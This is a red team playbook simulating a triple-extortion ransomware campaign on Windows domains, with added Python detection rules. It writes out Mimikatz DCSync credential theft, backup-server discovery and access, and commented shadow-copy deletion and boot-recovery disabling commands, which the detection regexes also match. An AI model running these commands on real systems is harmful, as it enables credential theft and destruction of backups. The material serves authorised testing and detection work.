# Ransomware campaign simulation
End-to-end simulation of a modern triple-extortion ransomware campaign for red team exercises. Goal: demonstrate the full impact chain from initial access to extortion demand, identifying the points at which detection and response could have intervened.
## Scope and prerequisites

- Authorisation: explicit written scope covering destructive simulation (this exercise must be run in an isolated lab environment or with explicit approval for destructive actions in production)
- Target environment: domain-joined Windows infrastructure with a backup server
- Entry point: phishing or initial access obtained by prior phases
- Success criteria: reach the backup infrastructure and demonstrate the ability to destroy it; deploy a simulated ransomware note; document the full kill chain
Note: this playbook describes simulation techniques. No real ransomware binary is deployed; the payload drops a text file in place of encryption.
## Phase 1: initial access and privilege escalation

```powershell
# confirm current context
whoami /all
(Get-ADDomain).DNSRoot

# if not yet SYSTEM or Domain Admin, escalate
# common paths: service misconfiguration, unquoted path, Kerberoasting
# see the privilege escalation and crypto-attacks sections
# target: reach Domain Admin or a context that can access backup infrastructure
Invoke-Mimikatz -Command '"lsadump::dcsync /user:Administrator"'
```
## Phase 2: map the environment before acting

```powershell
# identify backup servers before taking any destructive action
# look for: Veeam, Rubrik, Commvault, Windows Server Backup, cloud backup agents
Get-ADComputer -Filter * -Properties Description |
    Where-Object { $_.Description -match 'backup|veeam|rubrik' }

# identify domain controllers (critical for understanding blast radius)
(Get-ADDomain).ReplicaDirectoryServers

# identify servers running backup services
# $computers holds the computer names gathered from the Get-ADComputer query above
Invoke-Command -ComputerName $computers -ScriptBlock {
    Get-Service | Where-Object { $_.DisplayName -match 'Veeam|Backup|Shadow' }
}

# identify volume shadow copies (recovery path)
vssadmin list shadows
```
## Phase 3: exfiltrate before destroying (simulate)

In a real campaign, data is exfiltrated before any destructive action. In this simulation, document what data would have been exfiltrated:

```powershell
# identify high-value data stores (do not actually exfiltrate in simulation)
Get-ChildItem -Path '\\FILESERVER\Finance\' -Recurse -File |
    Where-Object { $_.Extension -in '.xlsx','.pdf','.docx' } |
    Measure-Object -Property Length -Sum

# document: X GB of financial records accessible to Domain Admin identity
# in a real campaign, this would be collected and staged for exfiltration
```
## Phase 4: demonstrate backup destruction capability (non-destructive)

```powershell
# simulate backup destruction WITHOUT actually destroying anything
# confirm access to backup server
Enter-PSSession -ComputerName BACKUP_SERVER -Credential $domainAdmin

# confirm backup paths are accessible
Get-Item '\\BACKUP_SERVER\BackupRepository\' -ErrorAction SilentlyContinue

# confirm shadow copy deletion capability (do not actually run in simulation)
# vssadmin delete shadows /all /quiet            <- SIMULATION ONLY; DO NOT RUN
# bcdedit /set {default} recoveryenabled no      <- SIMULATION ONLY; DO NOT RUN

# document: Domain Admin access to backup infrastructure confirmed;
# backup destruction would succeed if authorised
```
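The two commands marked SIMULATION ONLY above are exactly what a SOC should be alerting on. The following is an added detection example, not part of the playbook: it evaluates constructed process-creation records (Sysmon Event ID 1 or Security 4688 style fields `Computer`, `User`, `CommandLine`) against those two command patterns and raises severity when the host is one of the backup servers enumerated in Phase 2. The host list and sample events are constructed for the demo.

```python
import re
from dataclasses import dataclass

# Hosts identified as backup infrastructure in Phase 2 (constructed list)
BACKUP_HOSTS = {"backup_server"}

# (technique, regex over the normalised command line); these are the two
# recovery-inhibition commands the playbook marks SIMULATION ONLY
RULES = [
    ("shadow-copy-deletion", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b")),
    ("boot-recovery-disabled", re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b")),
]

@dataclass
class Alert:
    technique: str
    severity: str
    host: str
    user: str
    command_line: str

def normalise(cmd: str) -> str:
    # Windows command lines are case-insensitive; collapse runs of whitespace
    return " ".join(cmd.split()).lower()

def evaluate(events):
    """Return one Alert per matching process-creation event (Sysmon 1 / Security 4688)."""
    alerts = []
    for ev in events:
        cmd = normalise(ev.get("CommandLine", ""))
        for technique, rx in RULES:
            if rx.search(cmd):
                # recovery tampering on a backup host is worse than on a workstation
                sev = "critical" if ev["Computer"].lower() in BACKUP_HOSTS else "high"
                alerts.append(Alert(technique, sev, ev["Computer"], ev["User"], ev["CommandLine"]))
    return alerts

# Constructed telemetry for the demo; not captured from any real system
SAMPLE_EVENTS = [
    {"Computer": "BACKUP_SERVER", "User": "CORP\\da-jsmith",
     "CommandLine": "vssadmin  delete shadows /all /quiet"},
    {"Computer": "BACKUP_SERVER", "User": "CORP\\da-jsmith",
     "CommandLine": "vssadmin list shadows"},          # enumeration only (Phase 2); no alert
    {"Computer": "WS-042", "User": "CORP\\jdoe",
     "CommandLine": "BCDEDIT /set {default} RecoveryEnabled No"},
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.technique} on {a.host} by {a.user}: {a.command_line}")
```

Command-line matching is one signal only; pair it with the backup product's own audit log and shadow-copy deletion telemetry so the Phase 4 step cannot pass unnoticed.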
## Phase 5: deploy simulated ransomware note

In place of actual encryption, deploy a file that demonstrates the capability and documents what would have been encrypted:

```powershell
# identify encryption targets
$targets = Get-ChildItem -Path C:\Users,\\FILESERVER\Shares -Recurse -File `
    -Include *.docx,*.xlsx,*.pdf,*.sql,*.vmdk -ErrorAction SilentlyContinue
$totalGB = ($targets | Measure-Object Length -Sum).Sum / 1GB

# drop a ransom note in each target directory (simulation)
$note = @"
[SIMULATION - RED TEAM EXERCISE]
This system has been accessed by the red team during an authorised engagement.
In a real campaign, $($targets.Count) files ($([math]::Round($totalGB, 2)) GB)
would have been encrypted.
Backup servers: [ACCESSIBLE - destruction capability confirmed]
Exfiltration: [WOULD HAVE OCCURRED PRIOR TO ENCRYPTION]
Engagement reference: [ENGAGEMENT_ID]
Contact: [RED_TEAM_CONTACT]
"@
$note | Out-File -FilePath C:\RANSOM_NOTE_SIMULATION.txt -Encoding UTF8
```
## Phase 6: triple extortion simulation

Document the three extortion vectors that would be available:

```text
Extortion vector 1 (data): [X] GB of sensitive data accessible and would have
been exfiltrated prior to this notification.

Extortion vector 2 (encryption): [X] files would have been encrypted.
Recovery via backup would not have been possible (backup destruction confirmed).

Extortion vector 3 (DDoS): external-facing services identified at [list URLs].
DDoS capability via rented botnet infrastructure would have been available.
```
## Phase 7: document findings for report

| Finding | Evidence | Severity |
|---|---|---|
| Domain Admin via [escalation path] | Mimikatz output | Critical |
| Backup infrastructure accessible to DA | PSSession to backup server confirmed | Critical |
| Volume shadow copies deletable | vssadmin access confirmed | Critical |
| [X] GB sensitive data accessible | File enumeration results | Critical |
| Exfiltration not detected during prior phases | No SIEM alert generated | Critical |
| No alert on Domain Admin login to backup server | Check SIEM logs | High |
## Defensive gaps this demonstrates

- Time to detect domain admin activity: did the SOC alert?
- Backup isolation: were backup servers accessible from a compromised domain admin account, or was there additional access control?
- Shadow copy protection: was WORM or cloud-based backup in place?
- Data classification: could the engagement team find sensitive data easily, or was it difficult to locate?
- Exfiltration detection: were the prior exfiltration phases detected?
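The first two gaps (time to detect domain admin activity, and backup isolation) can be checked with one rule over logon telemetry. This is an added example, not part of the playbook: it evaluates constructed Security 4624 records against the Phase 2 backup host list and a Domain Admins membership snapshot, flags remote logons to backup hosts by any account that is not a dedicated backup administrator, and reports the earliest flagged logon as the reference point for measuring time-to-detect. The host list, group membership, allowed accounts and sample events are all constructed; in practice they come from Phase 2 enumeration and a scheduled AD group pull.

```python
from datetime import datetime

# Constructed reference data; in practice BACKUP_HOSTS comes from the Phase 2
# enumeration and DOMAIN_ADMINS from a scheduled AD group-membership pull
BACKUP_HOSTS = {"backup_server", "veeam01"}
DOMAIN_ADMINS = {"corp\\da-jsmith", "corp\\administrator"}
ALLOWED_BACKUP_ADMINS = {"corp\\backup-admin"}   # tier-separated accounts expected on backup hosts
REMOTE_LOGON_TYPES = {"3", "10"}                 # 3 = network (WinRM/PSSession, SMB), 10 = RemoteInteractive

def account(ev):
    return f"{ev['TargetDomainName']}\\{ev['TargetUserName']}".lower()

def evaluate_logons(events):
    """Flag network/interactive logons to backup hosts by accounts that should not be there."""
    findings = []
    for ev in events:
        if ev["EventID"] != 4624 or ev["Computer"].lower() not in BACKUP_HOSTS:
            continue
        if ev["LogonType"] not in REMOTE_LOGON_TYPES:
            continue                      # service/batch logons are the backup software itself
        acct = account(ev)
        if acct in ALLOWED_BACKUP_ADMINS:
            continue
        is_da = acct in DOMAIN_ADMINS     # a DA on a backup host means tiering is not enforced
        findings.append({
            "severity": "high" if is_da else "medium",
            "reason": "domain-admin-logon-to-backup-host" if is_da else "unexpected-account-on-backup-host",
            "host": ev["Computer"], "account": acct, "source": ev["IpAddress"],
            "time": datetime.fromisoformat(ev["TimeCreated"]),
        })
    return findings

def first_seen(findings):
    """Earliest flagged logon: compare against the SOC's first alert to get time-to-detect."""
    return min((f["time"] for f in findings), default=None)

SAMPLE_LOGONS = [  # constructed Security 4624 records, not real telemetry
    {"EventID": 4624, "Computer": "BACKUP_SERVER", "TargetDomainName": "CORP", "TargetUserName": "da-jsmith",
     "LogonType": "3", "IpAddress": "10.0.5.17", "TimeCreated": "2024-03-01T10:02:11+00:00"},
    {"EventID": 4624, "Computer": "BACKUP_SERVER", "TargetDomainName": "CORP", "TargetUserName": "backup-admin",
     "LogonType": "10", "IpAddress": "10.0.9.2", "TimeCreated": "2024-03-01T09:10:00+00:00"},
    {"EventID": 4624, "Computer": "BACKUP_SERVER", "TargetDomainName": "CORP", "TargetUserName": "svc-backup",
     "LogonType": "5", "IpAddress": "-", "TimeCreated": "2024-03-01T09:00:00+00:00"},
    {"EventID": 4624, "Computer": "FILESERVER", "TargetDomainName": "CORP", "TargetUserName": "da-jsmith",
     "LogonType": "3", "IpAddress": "10.0.5.17", "TimeCreated": "2024-03-01T09:55:40+00:00"},
    {"EventID": 4624, "Computer": "VEEAM01", "TargetDomainName": "CORP", "TargetUserName": "jdoe",
     "LogonType": "3", "IpAddress": "10.0.5.17", "TimeCreated": "2024-03-01T10:05:30+00:00"},
]
```

If this rule fires at all during the exercise, the backup tier is reachable with domain credentials; the fix is separate backup administrator identities and host-level restrictions, not just an alert.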
## Counter moves
A ransomware campaign is the access battle made visible at the end. Tested offline backups, segmentation to bound how far encryption spreads, and rapid isolation decide the blast radius. The defender’s view is in the blue notes on limiting the blast radius.